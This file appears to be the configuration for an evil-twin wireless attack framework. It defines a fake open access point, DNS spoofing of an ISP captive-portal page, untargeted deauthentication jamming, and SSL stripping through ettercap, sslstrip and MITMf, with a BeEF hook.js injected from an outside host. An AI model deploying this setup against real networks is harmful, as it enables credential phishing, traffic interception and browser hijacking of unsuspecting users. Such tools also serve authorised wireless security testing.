[etf]
	[[config_location]]
		dnsmasq_conf = /etc/dnsmasq.conf
		hostapd_conf = /etc/hostapd/hostapd_temp.conf
		networkmanager_conf = /etc/NetworkManager/NetworkManager.conf
		hosts_conf = /etc/hosts
		apache_conf = /etc/apache2/sites-available/
		apache_root = /var/www/html/
	
	
	[[aircommunicator]]
		[[[airhost]]]
			internet_interface = wlan0
			ap_interface = wlan1
			
			[[[[aplauncher]]]]
				bssid = 68:b6:fc:62:fd:20
				ssid = FON_ZON_FREE_INTERNET
				channel = 6
				hw_mode = g
				encryption = None
				password = tttttttt
				auth = None
				cipher = None
			
			[[[[dnsspoofer]]]]
				gateway = 192.168.2.1
				dhcp_range = 192.168.2.2, 192.168.2.254
				dns_server = 8.8.8.8, 8.8.4.4
				spoof_pages = portal.nos.pt,
				captive_portal_mode = true
		
		[[[airscanner]]]
			sniffing_interface = wlan1
			probes = True
			beacons = True
		
		[[[airdeauthor]]]
			jamming_interface = wlan1
			burst_count = 5
			targeted_only = False
	
	[[spawner]]
		tcp_redirection_port = 10000
		
		[[[ettercap]]]
			system_location = /usr/share/ettercap
			args = -T, -q, -u, -p, -i, wlan1
		
		[[[sslstrip]]]
			system_location = /usr/share/sslstrip
			args = -p, -f, -k
		
		[[[mitmf]]]
			system_location = /usr/share/mitmf
			args = -i, wlan1, --hsts, --inject, --js-url, http://192.168.1.5:3000/hook.js
		
		[[[beef]]]
			system_location = /usr/share/beef-xss
			args = ""


		
		
